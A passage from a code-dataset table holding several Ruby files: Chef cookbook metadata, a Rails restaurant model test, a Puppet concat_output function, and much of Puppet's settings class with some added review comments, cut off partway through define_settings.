hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
# Chef cookbook metadata for the chef-server cookbook: identity, license,
# its single cookbook dependency, and the supported platforms.
# NOTE(review): the hexsha/size prefix fused onto the next line looks like
# dataset-extraction residue, not part of the original metadata.rb —
# confirm and strip it when restoring the file.
28aa0a0dd5f42820e998971bda00eb9250e64394 | 375 | name 'chef-server'
version '3.1.1'
maintainer 'Chef Software, Inc.'
maintainer_email '[email protected]'
license 'Apache 2.0'
description 'Installs and configures Chef Server 12'
source_url 'https://github.com/chef-cookbooks/chef-server'
issues_url 'https://github.com/chef-cookbooks/chef-server/issues'
# Uses chef-server-ingredient to install the Chef Server package.
depends 'chef-server-ingredient'
supports 'centos'
supports 'ubuntu'
| 26.785714 | 65 | 0.784 |
e8829ebdb8ca7f04433b4fcda7caad3ce7517db6 | 1,075 | require 'test_helper'
# Unit tests for Restaurant creation: a newly created restaurant is
# expected to be seeded with default address fields and associated
# records (opening hours, dishes, menus, sections, categories).
class RestaurantTest < ActiveSupport::TestCase
  setup do
    @restaurant = restaurants(:one)
  end

  # Builds a minimal restaurant; creation callbacks should populate the
  # default associations asserted below.
  def create_restaurant
    Restaurant.create name: "Good Pizza", user_id: 1
  end

  test "should create opening_hours" do
    assert_not_empty create_restaurant.opening_hours
  end

  test "should have default address" do
    restaurant = create_restaurant
    assert restaurant.address
    assert restaurant.zip_code
    assert restaurant.city
  end

  test "should create dishes" do
    assert_not_empty create_restaurant.dishes
  end

  test "should create menus" do
    assert_not_empty create_restaurant.menus
  end

  test "should create sections" do
    # BUG FIX: this previously asserted on `menus` (copy-paste error), so
    # section creation was never actually verified. Assumes Restaurant
    # exposes a `sections` association — confirm against the model.
    assert_not_empty create_restaurant.sections
  end

  test "should create categories" do
    assert_not_empty create_restaurant.categories
  end
end
| 25.595238 | 65 | 0.736744 |
392721ee9dacdcd021fbb1830fe5a77f04495a2b | 1,048 | #
# Copyright (C) 2012 Onyx Point, Inc. <http://onyxpoint.com/>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Registers the concat_output parser function: given a concat build name,
# it returns the absolute path of that build's generated output file
# under the client's Puppet vardir.
module Puppet::Parser::Functions
  newfunction(:concat_output, :type => :rvalue, :doc => "Returns the output file for a given concat build.") do |args|
    # Prefer the ::puppet_vardir fact; fall back to the local Puppet
    # setting when the fact is absent or unresolved.
    fact_vardir = lookupvar('::puppet_vardir')
    vardir =
      if fact_vardir.nil? || fact_vardir == :undefined
        Puppet[:vardir]
      else
        fact_vardir
      end
    "#{vardir}/concat/output/#{args.first}.out"
  end
end
| 36.137931 | 120 | 0.695611 |
ff88509d78ae169f142c7027e59d8e30f4389992 | 51,891 | require 'puppet'
require 'getoptlong'
require 'puppet/util/watched_file'
require 'puppet/util/command_line/puppet_option_parser'
require 'forwardable'
require 'fileutils'
# The class for handling configuration files.
class Puppet::Settings
extend Forwardable
include Enumerable
require 'puppet/settings/errors'
require 'puppet/settings/base_setting'
require 'puppet/settings/string_setting'
require 'puppet/settings/enum_setting'
require 'puppet/settings/symbolic_enum_setting'
require 'puppet/settings/array_setting'
require 'puppet/settings/file_setting'
require 'puppet/settings/directory_setting'
require 'puppet/settings/file_or_directory_setting'
require 'puppet/settings/path_setting'
require 'puppet/settings/boolean_setting'
require 'puppet/settings/terminus_setting'
require 'puppet/settings/duration_setting'
require 'puppet/settings/ttl_setting'
require 'puppet/settings/priority_setting'
require 'puppet/settings/autosign_setting'
require 'puppet/settings/config_file'
require 'puppet/settings/value_translator'
require 'puppet/settings/environment_conf'
require 'puppet/settings/server_list_setting'
require 'puppet/settings/http_extra_headers_setting'
require 'puppet/settings/certificate_revocation_setting'
# local reference for convenience
PuppetOptionParser = Puppet::Util::CommandLine::PuppetOptionParser
attr_accessor :files
attr_reader :timer
# These are the settings that every app is required to specify; there are
# reasonable defaults defined in application.rb.
REQUIRED_APP_SETTINGS = [:logdir, :confdir, :vardir, :codedir]
# The acceptable sections of the puppet.conf configuration file.
ALLOWED_SECTION_NAMES = ['main', 'master', 'agent', 'user'].freeze
NONE = 'none'.freeze
# This method is intended for puppet internal use only; it is a convenience method that
# returns reasonable application default settings values for a given run_mode.
# Builds the hash of application-default setting values derived from a
# run mode object: its name plus the standard directory locations.
# Intended for puppet-internal use only.
#
# @param run_mode [Puppet::Util::RunMode] the run mode to derive defaults from
# @return [Hash{Symbol => Object}] the application default settings
def self.app_defaults_for_run_mode(run_mode)
  defaults = { :name => run_mode.to_s, :run_mode => run_mode.name }
  defaults[:confdir] = run_mode.conf_dir
  defaults[:codedir] = run_mode.code_dir
  defaults[:vardir]  = run_mode.var_dir
  defaults[:rundir]  = run_mode.run_dir
  defaults[:logdir]  = run_mode.log_dir
  defaults
end
# Derives the default certname from the hostname and domain facts:
# "host.domain" when a non-empty domain fact is present, otherwise just
# the hostname, with any single trailing dot stripped.
#
# @return [String] the default certificate name
def self.default_certname()
  host = hostname_fact
  dom = domain_fact
  fqdn =
    if dom && dom != ""
      [host, dom].join(".")
    else
      host
    end
  fqdn.to_s.gsub(/\.$/, '')
end
def self.hostname_fact()
Facter.value :hostname
end
def self.domain_fact()
Facter.value :domain
end
def self.default_config_file_name
"puppet.conf"
end
# Renders the effective settings for the given section as a hash suitable
# for display: keys and symbol values stringified (see #stringifyhash).
#
# @param section [String, Symbol] the config section to resolve values for
# @param settings [Array<Symbol>, :all] specific setting names, or :all
# @return [Hash{String => Object}] stringified name/value pairs
def stringify_settings(section, settings = :all)
# Resolve the requested section first so environment loader paths can be
# interpolated from it.
values_from_the_selected_section =
values(nil, section.to_sym)
loader_settings = {
:environmentpath => values_from_the_selected_section.interpolate(:environmentpath),
:basemodulepath => values_from_the_selected_section.interpolate(:basemodulepath),
}
Puppet.override(Puppet.base_context(loader_settings),
_("New environment loaders generated from the requested section.")) do
# And now we can lookup values that include those from environments configured from
# the requested section
values = values(Puppet[:environment].to_sym, section.to_sym)
to_be_rendered = {}
# :all expands to every defined setting name.
settings = Puppet.settings.to_a.collect(&:first) if settings == :all
settings.sort.each do |setting_name|
to_be_rendered[setting_name] = values.print(setting_name.to_sym)
end
stringifyhash(to_be_rendered)
end
end
# Recursively converts a settings hash for rendering: keys become
# strings, Symbol values become strings, nested hashes are converted the
# same way, and every other value passes through untouched.
#
# @param hash [Hash] the hash to convert
# @return [Hash{String => Object}] the converted copy
def stringifyhash(hash)
  hash.each_with_object({}) do |(key, val), out|
    out[key.to_s] =
      case val
      when Hash then stringifyhash(val)
      when Symbol then val.to_s
      else val
      end
  end
end
# Create a new collection of config settings.
def initialize
# Setting definitions keyed by name, plus an index by short option name.
@config = {}
@shortnames = {}
@created = []
# Keep track of set values.
# Each Values layer is one precedence level (cli, memory, application
# defaults, overridden defaults) consulted during value resolution.
@value_sets = {
:cli => Values.new(:cli, @config),
:memory => Values.new(:memory, @config),
:application_defaults => Values.new(:application_defaults, @config),
:overridden_defaults => Values.new(:overridden_defaults, @config),
}
# Parsed puppet.conf data, populated by #parse_config.
@configuration_file = nil
# And keep a per-environment cache
@cache = Hash.new { |hash, key| hash[key] = {} }
@values = Hash.new { |hash, key| hash[key] = {} }
# The list of sections we've used.
@used = []
# Hooks deferred until application initialization, and bookkeeping for
# deprecated settings seen in configuration.
@hooks_to_call_on_application_initialization = []
@deprecated_setting_names = []
@deprecated_settings_that_have_been_configured = []
@translate = Puppet::Settings::ValueTranslator.new
@config_file_parser = Puppet::Settings::ConfigFile.new(@translate)
end
# Retrieve a config value
# @param param [Symbol] the name of the setting
# @return [Object] the value of the setting
# @api private
def [](param)
if @deprecated_setting_names.include?(param)
issue_deprecation_warning(setting(param), "Accessing '#{param}' as a setting is deprecated.")
end
value(param)
end
# Set a config value. This doesn't set the defaults, it sets the value itself.
# @param param [Symbol] the name of the setting
# @param value [Object] the new value of the setting
# @api private
def []=(param, value)
if @deprecated_setting_names.include?(param)
issue_deprecation_warning(setting(param), "Modifying '#{param}' as a setting is deprecated.")
end
@value_sets[:memory].set(param, value)
unsafe_flush_cache
end
# Create a new default value for the given setting. The default overrides are
# higher precedence than the defaults given in defaults.rb, but lower
# precedence than any other values for the setting. This allows one setting
# `a` to change the default of setting `b`, but still allow a user to provide
# a value for setting `b`.
#
# @param param [Symbol] the name of the setting
# @param value [Object] the new default value for the setting
# @api private
def override_default(param, value)
@value_sets[:overridden_defaults].set(param, value)
unsafe_flush_cache
end
# Generate the list of valid arguments, in a format that GetoptLong can
# understand, and add them to the passed option list.
def addargs(options)
# Add all of the settings as valid options.
self.each { |name, setting|
setting.getopt_args.each { |args| options << args }
}
options
end
# Generate the list of valid arguments, in a format that OptionParser can
# understand, and add them to the passed option list.
def optparse_addargs(options)
# Add all of the settings as valid options.
self.each { |name, setting|
options << setting.optparse_args
}
options
end
# Is our setting a boolean setting?
# True when the named setting exists and is a boolean-typed setting.
#
# @param param [String, Symbol] the setting name
# @return [Boolean]
def boolean?(param)
  entry = @config[param.to_sym]
  !entry.nil? && entry.kind_of?(BooleanSetting)
end
# Remove all set values, potentially skipping cli values.
def clear
unsafe_clear
end
# Remove all set values, potentially skipping cli values.
# Remove all set values, potentially skipping cli values.
#
# @param clear_cli [Boolean] also discard command-line values (and the
# list of "used" sections, which depends on them)
# @param clear_application_defaults [Boolean] also discard application
# defaults, forcing app-default re-initialization
def unsafe_clear(clear_cli = true, clear_application_defaults = false)
if clear_application_defaults
@value_sets[:application_defaults] = Values.new(:application_defaults, @config)
@app_defaults_initialized = false
end
if clear_cli
@value_sets[:cli] = Values.new(:cli, @config)
# Only clear the 'used' values if we were explicitly asked to clear out
# :cli values; otherwise, it may be just a config file reparse,
# and we want to retain this cli values.
@used = []
end
# The memory and overridden-default layers are always reset, along with
# deprecation bookkeeping and all per-environment caches.
@value_sets[:memory] = Values.new(:memory, @config)
@value_sets[:overridden_defaults] = Values.new(:overridden_defaults, @config)
@deprecated_settings_that_have_been_configured.clear
@values.clear
@cache.clear
end
private :unsafe_clear
# Clears all cached settings for a particular environment to ensure
# that changes to environment.conf are reflected in the settings if
# the environment timeout has expired.
#
# param [String, Symbol] environment the name of environment to clear settings for
#
# @api private
# Drops all cached/interpolated settings for a single environment so a
# re-read of environment.conf is reflected once its timeout has expired.
# No-op when environment is nil.
#
# @param environment [String, Symbol, nil] environment name to clear
# @api private
def clear_environment_settings(environment)
  return if environment.nil?

  env_key = environment.to_sym
  @cache[env_key].clear
  @values[env_key] = {}
end
# Clear @cache, @used and the Environment.
#
# Whenever an object is returned by Settings, a copy is stored in @cache.
# As long as Setting attributes that determine the content of returned
# objects remain unchanged, Settings can keep returning objects from @cache
# without re-fetching or re-generating them.
#
# Whenever a Settings attribute changes, such as @values or @preferred_run_mode,
# this method must be called to clear out the caches so that updated
# objects will be returned.
def flush_cache
unsafe_flush_cache
end
def unsafe_flush_cache
clearused
end
private :unsafe_flush_cache
def clearused
@cache.clear
@used = []
end
def global_defaults_initialized?()
@global_defaults_initialized
end
def initialize_global_settings(args = [], require_config = true)
raise Puppet::DevError, _("Attempting to initialize global default settings more than once!") if global_defaults_initialized?
# The first two phases of the lifecycle of a puppet application are:
# 1) Parse the command line options and handle any of them that are
# registered, defined "global" puppet settings (mostly from defaults.rb).
# 2) Parse the puppet config file(s).
parse_global_options(args)
parse_config_files(require_config)
@global_defaults_initialized = true
end
# This method is called during application bootstrapping. It is responsible for parsing all of the
# command line options and initializing the settings accordingly.
#
# It will ignore options that are not defined in the global puppet settings list, because they may
# be valid options for the specific application that we are about to launch... however, at this point
# in the bootstrapping lifecycle, we don't yet know what that application is.
# Parses all registered global settings out of args, ignoring options that
# may belong to the not-yet-selected application, and records them in the
# :cli layer. Also consumes any --run_mode argument (which sets the
# preferred run mode) and removes it from args, which is mutated in place.
#
# @param args [Array<String>] raw command-line arguments
def parse_global_options(args)
# Create an option parser
option_parser = PuppetOptionParser.new
option_parser.ignore_invalid_options = true
# Add all global options to it.
self.optparse_addargs([]).each do |option|
option_parser.on(*option) do |arg|
opt, val = Puppet::Settings.clean_opt(option[0], arg)
handlearg(opt, val)
end
end
option_parser.on('--run_mode',
"The effective 'run mode' of the application: master, agent, or user.",
:REQUIRED) do |arg|
Puppet.settings.preferred_run_mode = arg
end
option_parser.parse(args)
# remove run_mode options from the arguments so that later parses don't think
# it is an unknown option.
# Two delete_at calls: the flag itself and its following value argument.
while option_index = args.index('--run_mode') do #rubocop:disable Lint/AssignmentInCondition
args.delete_at option_index
args.delete_at option_index
end
args.reject! { |arg| arg.start_with? '--run_mode=' }
end
private :parse_global_options
# A utility method (public, is used by application.rb and perhaps elsewhere) that munges a command-line
# option string into the format that Puppet.settings expects. (This mostly has to deal with handling the
# "no-" prefix on flag/boolean options).
#
# @param [String] opt the command line option that we are munging
# @param [String, TrueClass, FalseClass] val the value for the setting (as determined by the OptionParser)
# Munges a command-line option string into the format Puppet.settings
# expects: a "--[no-]flag" spec becomes "--no-flag" when the value is
# falsy, and the "[no-]" marker is simply dropped otherwise.
#
# @param opt [String] the command line option being munged
# @param val [String, TrueClass, FalseClass] the value parsed for the option
# @return [Array(String, Object)] the cleaned option and the untouched value
def self.clean_opt(opt, val)
  cleaned = opt.dup
  if cleaned =~ /\[no-\]/ && !val
    cleaned = cleaned.gsub(/\[no-\]/, 'no-')
  end
  # Strip any remaining "[no-]" marker so downstream code sees a plain name.
  [cleaned.gsub(/\[no-\]/, ''), val]
end
def app_defaults_initialized?
@app_defaults_initialized
end
# Initializes the application default settings supplied by the app
# (logdir, confdir, vardir, codedir, plus run_mode), then applies file
# metadata, fires deferred setting hooks, warns about deprecations, and
# creates ancestor directories for the required path settings.
#
# @param app_defaults [Hash] map of app default names to values
# @raise [SettingsError] when a required app default is missing
def initialize_app_defaults(app_defaults)
REQUIRED_APP_SETTINGS.each do |key|
raise SettingsError, "missing required app default setting '#{key}'" unless app_defaults.has_key?(key)
end
app_defaults.each do |key, value|
# :run_mode goes through its validating writer, not the value layers.
if key == :run_mode
self.preferred_run_mode = value
else
@value_sets[:application_defaults].set(key, value)
unsafe_flush_cache
end
end
apply_metadata
call_hooks_deferred_to_application_initialization
issue_deprecations
REQUIRED_APP_SETTINGS.each do |key|
create_ancestors(Puppet[key])
end
@app_defaults_initialized = true
end
# Create ancestor directories.
#
# @param dir [String] absolute path for a required application default directory
# @api private
# Ensures the parent directory of a required application-default path
# exists, creating any missing ancestor directories along the way.
#
# @param dir [String] absolute path for a required application default directory
# @api private
def create_ancestors(dir)
  ancestor = File.dirname(dir)
  FileUtils.mkdir_p(ancestor) unless File.exist?(ancestor)
end
private :create_ancestors
def call_hooks_deferred_to_application_initialization(options = {})
@hooks_to_call_on_application_initialization.each do |setting|
begin
setting.handle(self.value(setting.name))
rescue InterpolationError => err
raise InterpolationError, err.message, err.backtrace unless options[:ignore_interpolation_dependency_errors]
#swallow. We're not concerned if we can't call hooks because dependencies don't exist yet
#we'll get another chance after application defaults are initialized
end
end
end
private :call_hooks_deferred_to_application_initialization
# Return a value's description.
# Returns the description text of the named setting, or nil when no such
# setting is defined.
#
# @param name [String, Symbol] the setting name
# @return [String, nil]
def description(name)
  setting_obj = @config[name.to_sym]
  setting_obj ? setting_obj.desc : nil
end
def_delegators :@config, :each, :each_pair, :each_key
# Iterate over each section name.
# Yields each distinct section name used by the defined settings, in the
# order sections are first encountered.
def eachsection
  seen = []
  @config.each_value do |setting_obj|
    sec = setting_obj.section
    next if seen.include?(sec)
    seen << sec
    yield sec
  end
end
# Returns a given setting by name
# @param name [Symbol] The name of the setting to fetch
# @return [Puppet::Settings::BaseSetting] The setting object
# Looks up the setting object registered under the given name.
#
# @param param [String, Symbol] the name of the setting to fetch
# @return [Puppet::Settings::BaseSetting, nil] the setting object, if any
def setting(param)
  @config[param.to_sym]
end
# Handle a command-line argument.
# Handle a command-line argument: normalizes the raw option/value pair
# and records it in the :cli value layer, flushing caches.
#
# @param opt [String] the option string, e.g. "--certname" or "--no-daemonize"
# @param value [String, TrueClass, FalseClass, nil] the parsed option value
def handlearg(opt, value = nil)
@cache.clear
# Normalize boolean objects to their string forms before translation.
if value.is_a?(FalseClass)
value = "false"
elsif value.is_a?(TrueClass)
value = "true"
end
value &&= @translate[value]
str = opt.sub(/^--/,'')
# A "no-" prefix flips the implied boolean value of a flag option.
bool = true
newstr = str.sub(/^no-/, '')
if newstr != str
str = newstr
bool = false
end
str = str.intern
# Flags given with no explicit value fall back to the implied boolean.
if @config[str].is_a?(Puppet::Settings::BooleanSetting)
if value == "" or value.nil?
value = bool
end
end
s = @config[str]
if s
@deprecated_settings_that_have_been_configured << s if s.completely_deprecated?
end
@value_sets[:cli].set(str, value)
unsafe_flush_cache
end
# True when a setting with the given name has been defined.
#
# @param name [String, Symbol] the setting name
# @return [Boolean]
def include?(name)
  key = name.is_a?(String) ? name.intern : name
  @config.include?(key)
end
# Prints the contents of a config file with the available config settings, or it
# prints a single value of a config setting.
def print_config_options
if Puppet::Util::Log.sendlevel?(:info)
Puppet::Util::Log.newdestination(:console)
message = (_("Using --configprint is deprecated. Use 'puppet config <subcommand>' instead."))
Puppet.deprecation_warning(message)
end
env = value(:environment)
val = value(:configprint)
if val == "all"
hash = {}
each do |name, obj|
val = value(name,env)
val = val.inspect if val == ""
hash[name] = val
end
hash.sort { |a,b| a[0].to_s <=> b[0].to_s }.each do |name, v|
puts "#{name} = #{v}"
end
else
val.split(/\s*,\s*/).sort.each do |v|
if include?(v)
#if there is only one value, just print it for back compatibility
if v == val
puts value(val,env)
break
end
puts "#{v} = #{value(v,env)}"
else
puts "invalid setting: #{v}"
return false
end
end
end
true
end
def generate_config
puts to_config
true
end
def generate_manifest
puts to_manifest
true
end
def print_configs
return print_config_options if value(:configprint) != ""
return generate_config if value(:genconfig)
generate_manifest if value(:genmanifest)
end
def print_configs?
(value(:configprint) != "" || value(:genconfig) || value(:genmanifest)) && true
end
# The currently configured run mode that is preferred for constructing the application configuration.
def preferred_run_mode
@preferred_run_mode_name || :user
end
# PRIVATE! This only exists because we need a hook to validate the run mode when it's being set, and
# it should never, ever, ever, ever be called from outside of this file.
# This method is also called when --run_mode MODE is used on the command line to set the default
#
# @param mode [String|Symbol] the name of the mode to have in effect
# @api private
# Validates and records the preferred run mode (:master, :agent or
# :user), then flushes cached settings since the mode changes how values
# are resolved.
#
# @param mode [String, Symbol] the name of the mode to have in effect
# @raise [ValidationError] when mode is not a known run mode
# @api private
def preferred_run_mode=(mode)
mode = mode.to_s.downcase.intern
raise ValidationError, "Invalid run mode '#{mode}'" unless [:master, :agent, :user].include?(mode)
@preferred_run_mode_name = mode
# Changing the run mode has far-reaching consequences. Flush any cached
# settings so they will be re-generated.
flush_cache
mode
end
# Parses configuration text in puppet.conf format, replaces previously
# file-sourced settings with the parsed data, and fires (or defers) the
# hooks of any settings that received values.
#
# @param text [String] the configuration file contents
# @param file [String] the path used in error messages and metadata
def parse_config(text, file = "text")
begin
data = @config_file_parser.parse_file(file, text, ALLOWED_SECTION_NAMES)
rescue => detail
Puppet.log_exception(detail, "Could not parse #{file}: #{detail}")
return
end
# If we get here and don't have any data, we just return and don't muck with the current state of the world.
return if data.nil?
# If we get here then we have some data, so we need to clear out any
# previous settings that may have come from config files.
unsafe_clear(false, false)
# Screen settings which have been deprecated and removed from puppet.conf
# but are still valid on the command line and/or in environment.conf
screen_non_puppet_conf_settings(data)
# Make note of deprecated settings we will warn about later in initialization
record_deprecations_from_puppet_conf(data)
# And now we can repopulate with the values from our last parsing of the config files.
@configuration_file = data
# Determine our environment, if we have one.
if @config[:environment]
env = self.value(:environment).to_sym
else
env = NONE
end
# Call any hooks we should be calling.
value_sets = value_sets_for(env, preferred_run_mode)
@config.values.select(&:has_hook?).each do |setting|
value_sets.each do |source|
if source.include?(setting.name)
# We still have to use value to retrieve the value, since
# we want the fully interpolated value, not $vardir/lib or whatever.
# This results in extra work, but so few of the settings
# will have associated hooks that it ends up being less work this
# way overall.
if setting.call_hook_on_initialize?
@hooks_to_call_on_application_initialization |= [ setting ]
else
setting.handle(ChainedValues.new(
preferred_run_mode,
env,
value_sets,
@config).interpolate(setting.name))
end
break
end
end
end
call_hooks_deferred_to_application_initialization :ignore_interpolation_dependency_errors => true
apply_metadata
end
# Parse the configuration file. Just provides thread safety.
# Reads the active configuration file, if present, and feeds its contents
# to #parse_config. Missing files are silently ignored.
#
# @param require_config [Boolean] when true, a read failure is fatal;
# otherwise it is logged and ignored
def parse_config_files(require_config = true)
file = which_configuration_file
if Puppet::FileSystem.exist?(file)
begin
text = read_file(file)
rescue => detail
message = _("Could not load %{file}: %{detail}") % { file: file, detail: detail}
if require_config
Puppet.log_and_raise(detail, message)
else
Puppet.log_exception(detail, message)
return
end
end
else
return
end
parse_config(text, file)
end
private :parse_config_files
def main_config_file
if explicit_config_file?
return self[:config]
else
return File.join(Puppet::Util::RunMode[:master].conf_dir, config_file_name)
end
end
private :main_config_file
def user_config_file
return File.join(Puppet::Util::RunMode[:user].conf_dir, config_file_name)
end
private :user_config_file
# This method is here to get around some life-cycle issues. We need to be
# able to determine the config file name before the settings / defaults are
# fully loaded. However, we also need to respect any overrides of this value
# that the user may have specified on the command line.
#
# The easiest way to do this is to attempt to read the setting, and if we
# catch an error (meaning that it hasn't been set yet), we'll fall back to
# the default value.
def config_file_name
begin
return self[:config_file_name] if self[:config_file_name]
rescue SettingsError
# This just means that the setting wasn't explicitly set on the command line, so we will ignore it and
# fall through to the default name.
end
return self.class.default_config_file_name
end
private :config_file_name
def apply_metadata
# We have to do it in the reverse of the search path,
# because multiple sections could set the same value
# and I'm too lazy to only set the metadata once.
if @configuration_file
searchpath(nil, preferred_run_mode).reverse_each do |source|
section = @configuration_file.sections[source.name] if source.type == :section
if section
apply_metadata_from_section(section)
end
end
end
end
private :apply_metadata
def apply_metadata_from_section(section)
section.settings.each do |setting|
type = @config[setting.name] if setting.has_metadata?
if type
type.set_meta(setting.meta)
end
end
end
SETTING_TYPES = {
:string => StringSetting,
:file => FileSetting,
:directory => DirectorySetting,
:file_or_directory => FileOrDirectorySetting,
:path => PathSetting,
:boolean => BooleanSetting,
:terminus => TerminusSetting,
:duration => DurationSetting,
:ttl => TTLSetting,
:array => ArraySetting,
:enum => EnumSetting,
:symbolic_enum => SymbolicEnumSetting,
:priority => PrioritySetting,
:autosign => AutosignSetting,
:server_list => ServerListSetting,
:http_extra_headers => HttpExtraHeadersSetting,
:certificate_revocation => CertificateRevocationSetting
}
# Create a new setting. The value is passed in because it's used to determine
# what kind of setting we're creating, but the value itself might be either
# a default or a value, so we can't actually assign it.
#
# See #define_settings for documentation on the legal values for the ":type" option.
def newsetting(hash)
klass = nil
hash[:section] = hash[:section].to_sym if hash[:section]
type = hash[:type]
if type
klass = SETTING_TYPES[type]
unless klass
raise ArgumentError, _("Invalid setting type '%{type}'") % { type: type }
end
hash.delete(:type)
else
# The only implicit typing we still do for settings is to fall back to "String" type if they didn't explicitly
# specify a type. Personally I'd like to get rid of this too, and make the "type" option mandatory... but
# there was a little resistance to taking things quite that far for now. --cprice 2012-03-19
klass = StringSetting
end
hash[:settings] = self
setting = klass.new(hash)
setting
end
# This has to be private, because it doesn't add the settings to @config
private :newsetting
# Iterate across all of the objects in a given section.
# Yields every setting object that belongs to the given section.
#
# @param section [String, Symbol] the section name to filter on
def persection(section)
  wanted = section.to_sym
  self.each do |_name, obj|
    yield obj if obj.section == wanted
  end
end
# Reparse our config file, if necessary.
# Reparse our config file, if necessary.
#
# Checks the watched config files and, when one has changed on disk, logs
# which file triggered the reparse, re-reads all config files, and
# re-applies the previously "used" sections.
def reparse_config_files
  if files
    filename = any_files_changed?
    if filename
      # BUG FIX: the message previously contained the literal corrupted
      # text "#(unknown)" instead of interpolating the changed file's
      # name, leaving the `filename` local unused.
      Puppet.notice "Config file #{filename} changed; triggering re-parse of all config files."
      parse_config_files
      reuse
    end
  end
end
def files
return @files if @files
@files = []
[main_config_file, user_config_file].each do |path|
if Puppet::FileSystem.exist?(path)
@files << Puppet::Util::WatchedFile.new(path)
end
end
@files
end
private :files
# Checks to see if any of the config files have been modified
# @return the filename of the first file that is found to have changed, or
# nil if no files have changed
# Checks to see if any of the config files have been modified.
#
# @return [String, nil] the path of the first watched file found to have
# changed, or nil when none have changed
def any_files_changed?
  changed = files.find(&:changed?)
  changed && changed.to_str
end
private :any_files_changed?
def reuse
return unless defined?(@used)
new = @used
@used = []
self.use(*new)
end
class SearchPathElement < Struct.new(:name, :type); end
# The order in which to search for values, without defaults.
#
# @param environment [String,Symbol] symbolic reference to an environment name
# @param run_mode [Symbol] symbolic reference to a Puppet run mode
# @return [Array<SearchPathElement>]
# @api private
# The order in which to search for values, without defaults: the memory
# and cli layers first, then the environment (when given), the run-mode
# section (when given), and finally the [main] section.
#
# @param environment [String, Symbol, nil] environment name to include
# @param run_mode [Symbol, nil] run mode section to include
# @return [Array<SearchPathElement>]
# @api private
def configsearchpath(environment = nil, run_mode = preferred_run_mode)
  path = [
    SearchPathElement.new(:memory, :values),
    SearchPathElement.new(:cli, :values),
  ]
  path << SearchPathElement.new(environment.intern, :environment) if environment
  path << SearchPathElement.new(run_mode, :section) if run_mode
  path << SearchPathElement.new(:main, :section)
end
# The order in which to search for values.
#
# @param environment [String,Symbol] symbolic reference to an environment name
# @param run_mode [Symbol] symbolic reference to a Puppet run mode
# @return [Array<SearchPathElement>]
# @api private
def searchpath(environment = nil, run_mode = preferred_run_mode)
searchpath = configsearchpath(environment, run_mode)
searchpath << SearchPathElement.new(:application_defaults, :values)
searchpath << SearchPathElement.new(:overridden_defaults, :values)
end
def service_user_available?
return @service_user_available if defined?(@service_user_available)
if self[:user]
user = Puppet::Type.type(:user).new :name => self[:user], :audit => :ensure
@service_user_available = user.exists?
else
@service_user_available = false
end
end
def service_group_available?
return @service_group_available if defined?(@service_group_available)
if self[:group]
group = Puppet::Type.type(:group).new :name => self[:group], :audit => :ensure
@service_group_available = group.exists?
else
@service_group_available = false
end
end
# Allow later inspection to determine if the setting was set on the
# command line, or through some other code path. Used for the
# `dns_alt_names` option during cert generate. --daniel 2011-10-18
def set_by_cli?(param)
param = param.to_sym
!@value_sets[:cli].lookup(param).nil?
end
# Get values from a search path entry.
# @api private
# Maps a SearchPathElement to its backing value store: an in-memory
# Values layer, a section of the parsed config file (nil when that
# section is absent), or environment.conf-backed values.
#
# @param source [SearchPathElement] the search path entry to resolve
# @raise [Puppet::DevError] for an unrecognized element type
# @api private
def searchpath_values(source)
case source.type
when :values
@value_sets[source.name]
when :section
section = @configuration_file.sections[source.name] if @configuration_file
if section
ValuesFromSection.new(source.name, section)
end
when :environment
ValuesFromEnvironmentConf.new(source.name)
else
raise Puppet::DevError, _("Unknown searchpath case: %{source_type} for the %{source} settings path element.") % { source_type: source.type, source: source}
end
end
# Allow later inspection to determine if the setting was set by user
# config, rather than a default setting.
def set_by_config?(param, environment = nil, run_mode = preferred_run_mode)
param = param.to_sym
configsearchpath(environment, run_mode).any? do |source|
vals = searchpath_values(source)
if vals
vals.lookup(param)
end
end
end
# Patches the value for a param in a section.
# This method is required to support the use case of unifying --dns-alt-names and
# --dns_alt_names in the certificate face. Ideally this should be cleaned up.
# See PUP-3684 for more information.
# For regular use of setting a value, the method `[]=` should be used.
# @api private
#
def patch_value(param, value, type)
if @value_sets[type]
@value_sets[type].set(param, value)
unsafe_flush_cache
end
end
# Define a group of settings.
#
# @param [Symbol] section a symbol to use for grouping multiple settings together into a conceptual unit. This value
# (and the conceptual separation) is not used very often; the main place where it will have a potential impact
# is when code calls Settings#use method. See docs on that method for further details, but basically that method
# just attempts to do any preparation that may be necessary before code attempts to leverage the value of a particular
# setting. This has the most impact for file/directory settings, where #use will attempt to "ensure" those
# files / directories.
# @param [Hash[Hash]] defs the settings to be defined. This argument is a hash of hashes; each key should be a symbol,
# which is basically the name of the setting that you are defining. The value should be another hash that specifies
# the parameters for the particular setting. Legal values include:
# [:default] => not required; this is the value for the setting if no other value is specified (via cli, config file, etc.)
# For string settings this may include "variables", demarcated with $ or ${} which will be interpolated with values of other settings.
# The default value may also be a Proc that will be called only once to evaluate the default when the setting's value is retrieved.
# [:desc] => required; a description of the setting, used in documentation / help generation
# [:type] => not required, but highly encouraged! This specifies the data type that the setting represents. If
# you do not specify it, it will default to "string". Legal values include:
# :string - A generic string setting
# :boolean - A boolean setting; values are expected to be "true" or "false"
# :file - A (single) file path; puppet may attempt to create this file depending on how the settings are used. This type
# also supports additional options such as "mode", "owner", "group"
# :directory - A (single) directory path; puppet may attempt to create this file depending on how the settings are used. This type
# also supports additional options such as "mode", "owner", "group"
# :path - This is intended to be used for settings whose value can contain multiple directory paths, represented
# as strings separated by the system path separator (e.g. system path, module path, etc.).
# [:mode] => an (optional) octal value to be used as the permissions/mode for :file and :directory settings
# [:owner] => optional owner username/uid for :file and :directory settings
# [:group] => optional group name/gid for :file and :directory settings
#
# Registers each setting in defs under the given section, indexing any
# short option names and collecting hooks that must fire immediately.
# See the preceding comment block for the full definition format.
def define_settings(section, defs)
section = section.to_sym
call = []
defs.each do |name, hash|
raise ArgumentError, _("setting definition for '%{name}' is not a hash!") % { name: name } unless hash.is_a? Hash
name = name.to_sym
hash[:name] = name
hash[:section] = section
